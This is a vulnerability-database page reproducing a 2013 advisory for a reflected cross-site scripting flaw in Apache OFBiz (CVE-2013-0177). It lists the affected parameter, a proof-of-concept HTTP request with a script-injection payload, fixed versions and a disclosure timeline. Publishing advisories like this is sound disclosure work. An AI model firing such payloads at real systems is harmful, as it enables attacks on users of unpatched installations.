Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMarcos GarciaPACKETSTORM:119673
HistoryJan 20, 2013 - 12:00 a.m.

Apache OFBiz Cross Site Scripting

2013-01-2000:00:00
Marcos Garcia
packetstormsecurity.com
21

0.002 Low

EPSS

Percentile

54.7%

JSON
`Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz  
Type: Remote  
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)  
CVE: CVE-2013-0177  
Impact: Direct execution of arbitrary code in the context of Webserver user.  
Release Date: 18.01.2013  
  
Summary  
=======  
  
Apache Open For Business (Apache OFBiz) is an open source enterprise  
resource planning (ERP) system. It provides a suite of enterprise  
applications that integrate and automate many of the business processes of  
an enterprise.  
  
Description  
===========  
  
Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and  
Image.alt Widget attributes because the content of these two elements is  
not properly escaped.  
  
  
Vendor  
======  
  
Apache ofbiz - http://ofbiz.apache.org/  
  
  
PoC  
===  
  
It is worth mentioning that originally the resource was using the HTTP  
method POST, but it was changed to GET to exploit it more easily.  
Something important to remark is that for this attack to work, the victim  
should be authenticated.  
  
Below you can see how the URL is specially crafted to expose the issue:  
  
Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->  
parameter: parentPortalPageId==[XSS]  
  
GET  
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>  
HTTP/1.1  
Host: 10.10.10.14:8443  
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101  
Firefox/17.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3  
Connection: keep-alive  
Referer:  
https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037  
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;  
OFBiz.Visitor=10002  
  
  
Solution  
========  
  
10.04.* users should upgrade to 10.04.05  
11.04.01 users should upgrade to 11.04.02  
  
  
Vendor Status  
=============  
  
[08.01.2013] Vulnerability discovered.  
[09.01.2013] Vendor informed.  
[09.01.2013] Vendor replied.  
[12.01.2013] Vendor reveals patch release date.  
[18.01.2013] Public advisory.  
`

Related

cve 1
prion 1
cvelist 1
nvd 1
cve
cve
CVE-2013-0177
2014-01-30 15:06:22
prion
prion
Cross site scripting
2014-01-30 15:06:00
cvelist
cvelist
CVE-2013-0177
2014-01-30 15:00:00
nvd
nvd
CVE-2013-0177
2014-01-30 15:06:22

0.002 Low

EPSS

Percentile

54.7%

JSON
Related for PACKETSTORM:119673
cve1prion1cvelist1nvd1